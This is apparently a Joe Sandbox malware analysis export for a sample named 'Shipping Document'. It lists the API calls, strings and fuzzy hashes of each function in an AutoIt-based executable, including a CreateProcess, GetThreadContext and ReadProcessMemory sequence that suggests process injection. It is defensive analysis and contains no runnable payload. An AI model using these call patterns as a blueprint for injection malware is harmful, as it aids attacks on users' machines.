Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 8ece6e7c935bf6e32f7f5f42d4fb9f881b4dc90ea670b28a1a545745220d9280
Instruction ID: 3ddc24607fafa7327b665c54c71b2f05123a0ad348ca36ddea72f4145ced300d
Opcode Fuzzy Hash: 8ece6e7c935bf6e32f7f5f42d4fb9f881b4dc90ea670b28a1a545745220d9280
Instruction Fuzzy Hash: 7A718C714083069EC324EF25ED829AFBBE8FF84750F50442EF5C587168EB3A9948DB52

Function 00FC3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FC3A62
LoadCursorW.USER32(00000000,00007F00), ref: 00FC3A71
LoadIconW.USER32(00000063), ref: 00FC3A88
LoadIconW.USER32(000000A4), ref: 00FC3A9A
LoadIconW.USER32(000000A2), ref: 00FC3AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FC3AD2
RegisterClassExW.USER32(?), ref: 00FC3B28

Part of subcall function 00FC3041: GetSysColorBrush.USER32(0000000F), ref: 00FC3074
Part of subcall function 00FC3041: RegisterClassExW.USER32(00000030), ref: 00FC309E
Part of subcall function 00FC3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FC30AF
Part of subcall function 00FC3041: InitCommonControlsEx.COMCTL32(?), ref: 00FC30CC
Part of subcall function 00FC3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FC30DC
Part of subcall function 00FC3041: LoadIconW.USER32(000000A9), ref: 00FC30F2
Part of subcall function 00FC3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FC3101

Strings

0, xrefs: 00FC3B06
AutoIt v3, xrefs: 00FC3B17
#, xrefs: 00FC3B0D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: ae247be6ec55a72f8f53348ebbfe315be81a057ccf0b3053a9d73e5a245f56b2
Instruction ID: 550980d93bf49826335b1a934824ba6877e06b94d8f141326e04c16ebeb47cc8
Opcode Fuzzy Hash: ae247be6ec55a72f8f53348ebbfe315be81a057ccf0b3053a9d73e5a245f56b2
Instruction Fuzzy Hash: E5216DB5D04305AFEB20DFA8E949B9D7BB4FB08710F014199F580AA294C3BF55549F80

Function 00FC3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00FC36D2
KillTimer.USER32(?,00000001), ref: 00FC36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FC371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FC372A
CreatePopupMenu.USER32 ref: 00FC373E
PostQuitMessage.USER32(00000000), ref: 00FC375F

Strings

TaskbarCreated, xrefs: 00FC3725

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 45b6d7d708c5d502dd9899b82c489eb0771d8099f8e59c56387f9bac9699dc03
Instruction ID: cb74036093f0342933421f5538f685afba281c9a84cf58eb8cfd9794ee107e12
Opcode Fuzzy Hash: 45b6d7d708c5d502dd9899b82c489eb0771d8099f8e59c56387f9bac9699dc03
Instruction Fuzzy Hash: 3041F8F2618107BBDB24AB68EE4BF7D3755FB00390F14411DF68686295CA6F9D00B7A1

Function 00FC3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINERAW, xrefs: 00FC380D
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00FC37C0
/AutoIt3ExecuteLine, xrefs: 00FC38B9
/AutoIt3ExecuteScript, xrefs: 00FC38CE
CMDLINE, xrefs: 00FC3834
/AutoIt3OutputDebug, xrefs: 00FC38A4
/ErrorStdOut, xrefs: 00FC388F

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: d99ad63cde1df99c72cb1177670b946cfea92f7859b49c206aeeddd6737209ec
Instruction ID: 42d73942faf3f7e099cb60b71ace65c8f5adcaddd310caa40fc04a71464456fe
Opcode Fuzzy Hash: d99ad63cde1df99c72cb1177670b946cfea92f7859b49c206aeeddd6737209ec
Instruction Fuzzy Hash: E6A17E72C0422E9ACB14EBA1CD96FEEB778BF14340F04442DF452A7191DF796A09EB60

Function 01E52660 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01E52731
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01E52957

Memory Dump Source

Source File: 00000001.00000002.1516553081.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1e50000_Shipping Document.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 30e8af4b53c3aa052917812e21e5e8fbde56ed90f0e39d50c947676a587081b9
Instruction ID: ebe385aebbd2ce933d2d2090609cb1e138ce696dba19e3d87424e43a6306830a
Opcode Fuzzy Hash: 30e8af4b53c3aa052917812e21e5e8fbde56ed90f0e39d50c947676a587081b9
Instruction Fuzzy Hash: F5A1F974E0020AEBDB54CFE4C894BEEBBB5BF48304F209559EA15BB280D7759A41CF94

Function 00FC39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FC3A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FC3A36
ShowWindow.USER32(00000000,?,?), ref: 00FC3A4A
ShowWindow.USER32(00000000,?,?), ref: 00FC3A53

Strings

edit, xrefs: 00FC3A30
AutoIt v3, xrefs: 00FC3A0D, 00FC3A12, 00FC3A13

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 646e8708ae788bc3332677d1b1e664ab5b19ca07c9a11129a261167811363c6b
Instruction ID: 7ebdb3b6ecf06439ea5d9d9ed5fc68bd8a8a48cfb515acc314752cfa6fe6d04b
Opcode Fuzzy Hash: 646e8708ae788bc3332677d1b1e664ab5b19ca07c9a11129a261167811363c6b
Instruction Fuzzy Hash: 70F03AB46442A07FEA305667AC48F2B3E7DE7C6F51B02006EB980E6154C2AF0810CBB0

Function 01E52410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01E52300: Sleep.KERNELBASE(000001F4), ref: 01E52311

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01E5254C

Strings

X8UL0HX1JWQI2KFT, xrefs: 01E525AF, 01E525B2

Memory Dump Source

Source File: 00000001.00000002.1516553081.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1e50000_Shipping Document.jbxd

Similarity

API ID: CreateFileSleep
String ID: X8UL0HX1JWQI2KFT
API String ID: 2694422964-465430296
Opcode ID: 14af9af5724919459c0576f0552d3c974b63454b1ae8eb60d8aaf14a31a89b73
Instruction ID: 5c5a67bb87b1f9bd287df06dc7b8e263fa9aeb9af21af885fbcd1118bc1c8988
Opcode Fuzzy Hash: 14af9af5724919459c0576f0552d3c974b63454b1ae8eb60d8aaf14a31a89b73
Instruction Fuzzy Hash: E7518330D14249EBEF11DBA4D854BEEBB79AF18304F004199E609BB2C1D7B91B45CBA5

Function 00FC410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FFD5EC

Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66

_memset.LIBCMT ref: 00FC418D
_wcscpy.LIBCMT ref: 00FC41E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FC41F1

Strings

Line: , xrefs: 00FFD615

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: a77c837405a3dd1097a038d360eeaf050098d827406eb49a3b78065598649046
Instruction ID: 24e9563eebccdcd3d755366eb59b60df959d11939afaa08e39a5d241782725ec
Opcode Fuzzy Hash: a77c837405a3dd1097a038d360eeaf050098d827406eb49a3b78065598649046
Instruction Fuzzy Hash: 1431DE71408306AAD331FB60DE47FDE77E8AF44310F14491EB1C492092EF79A648EB92

Function 00FE564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00FE56AB
_memcpy_s.LIBCMT ref: 00FE571D
__read_nolock.LIBCMT ref: 00FE577B
__filbuf.LIBCMT ref: 00FE579E
_memset.LIBCMT ref: 00FE57E2

Part of subcall function 00FE8D68: __getptd_noexit.LIBCMT ref: 00FE8D68

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 8fbf7aabba6e59a3e66e9ebb07997f9bb5e4f8291921101491087935e54d3118
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: A751D631E00B89DBDB249F7BCC8466E77A1AF40B38F248729F835962D1D7749D60AB50

Function 00FC69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00FC4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FC4F6F

_free.LIBCMT ref: 00FFE68C
_free.LIBCMT ref: 00FFE6D3

Part of subcall function 00FC6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FC6D0D

Strings

Bad directive syntax error, xrefs: 00FFE6BB
>>>AUTOIT SCRIPT<<<, xrefs: 00FFE462

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 4f70efe5afac5d34d584d9aeba05ffc812d9a500af8d820b91ebe921494d2ee5
Instruction ID: d894aaac13a131cf341749d6745c481dc230da8b20d7a352b559d5710ea98645
Opcode Fuzzy Hash: 4f70efe5afac5d34d584d9aeba05ffc812d9a500af8d820b91ebe921494d2ee5
Instruction Fuzzy Hash: 9B917C7191021EAFCF04EFA4CD91AEDB7B4FF19314B04446DE955EB2A1DB34A904EB60

Function 00FC35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FC35A1,SwapMouseButtons,00000004,?), ref: 00FC35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FC35A1,SwapMouseButtons,00000004,?,?,?,?,00FC2754), ref: 00FC35F5
RegCloseKey.KERNELBASE(00000000,?,?,00FC35A1,SwapMouseButtons,00000004,?,?,?,?,00FC2754), ref: 00FC3617

Strings

Control Panel\Mouse, xrefs: 00FC35D2

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 846fc89c7d1c62e6dba3e3aaec79be5112a943407fee046c241046e3c3151073
Instruction ID: 51b0b8de385be5e9a5db51853e5b14600c4ace1cc4d39fca8759814c0e0a5163
Opcode Fuzzy Hash: 846fc89c7d1c62e6dba3e3aaec79be5112a943407fee046c241046e3c3151073
Instruction Fuzzy Hash: EE115AB5910209BFDB208F68D985EEEB7B8EF44790F018459F805D7200D2729F40B760

Function 01E51300 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01E51ABB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01E51B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E51B73

Memory Dump Source

Source File: 00000001.00000002.1516553081.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1e50000_Shipping Document.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
Instruction ID: 343b55d221c74cc42ac10ac425e9e4b4f23e3457988415dbd3079bc74d29d80f
Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
Instruction Fuzzy Hash: 54621C30A14258DBEB64CFA4C850BDEB772EF58304F1091A9E60DEB390E7759E81CB59

Function 00FE493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FE49D0
__flush.LIBCMT ref: 00FE49F0
__write.LIBCMT ref: 00FE4A23
__flsbuf.LIBCMT ref: 00FE4A51

Part of subcall function 00FE8D68: __getptd_noexit.LIBCMT ref: 00FE8D68

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: e1889389d640fa65a9388f781399392d8cd151b699414527d1cf581cba6bc81c
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: 66412771A007869BDF28CEABC8809AF77A6EF84770B24817DE855D7641D738FD40AB44

Function 00FC73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FFEE62
GetOpenFileNameW.COMDLG32(?), ref: 00FFEEAC

Part of subcall function 00FC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FC48A1,?,?,00FC37C0,?), ref: 00FC48CE

Part of subcall function 00FE09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FE09F4

Strings

X, xrefs: 00FFEE7A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 07f175fb5148739110afa21914a26d7036a4ba6a7fe06e81df59553c8bd85750
Instruction ID: 487e06258b2fe61a18e142f2c93696563fbed220ded97816d43b4f0a6264da1c
Opcode Fuzzy Hash: 07f175fb5148739110afa21914a26d7036a4ba6a7fe06e81df59553c8bd85750
Instruction Fuzzy Hash: 50210531E0028C9BCB15DF94CC46BEE7BF89F49314F00405AE508E7281DBB85A899FA1

Function 0102901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 01029036
__fread_nolock.LIBCMT ref: 0102904B

Strings

EA06, xrefs: 0102907D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 954647f3c50da98899e2b8dd367b92cea36953b4fa2f2367fbf5673d4fe5298c
Instruction ID: b2ec82df62cc72ade451f37bb559ceec6c7709401c63930de1a6b10455563a60
Opcode Fuzzy Hash: 954647f3c50da98899e2b8dd367b92cea36953b4fa2f2367fbf5673d4fe5298c
Instruction Fuzzy Hash: FB01F972904268AEDB28C6A9CC56EEE7BF89B01205F00419EF592D2181E579A704DB60

Function 01029B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 01029B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 01029B99

Strings

aut, xrefs: 01029B93

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 34d7c2d742fe6b283b1911b823e99b38a5659b681b63d8e87d0f0679604c786d
Instruction ID: 16243388befa27dc80b4b056e124228f41ada5a43e2b30f4f664d0b07e5355b6
Opcode Fuzzy Hash: 34d7c2d742fe6b283b1911b823e99b38a5659b681b63d8e87d0f0679604c786d
Instruction Fuzzy Hash: 97D05EB994030EBBDB209A94DD4EF9A772CE704700F0042A1BE9496091DEB655988B95

Function 0103CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 637166013c82fd67c198acb3cc3ad71192af955735b5e0d688621c6500499624
Instruction ID: 61cd67564388175c8ad3a80955a8f79410de2af0176c1d299b5a9eb982593894
Opcode Fuzzy Hash: 637166013c82fd67c198acb3cc3ad71192af955735b5e0d688621c6500499624
Instruction Fuzzy Hash: EAF17670A083019FC710DF68C984A6ABBE9FFC8314F44896EF8999B251D775E945CF82

Function 00FCF8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FE03D3
Part of subcall function 00FE03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FE03DB
Part of subcall function 00FE03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FE03E6
Part of subcall function 00FE03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FE03F1
Part of subcall function 00FE03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FE03F9
Part of subcall function 00FE03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE0401

Part of subcall function 00FD6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FCFA90), ref: 00FD62B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FCFB2D
OleInitialize.OLE32(00000000), ref: 00FCFBAA
CloseHandle.KERNEL32(00000000), ref: 010049F2

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
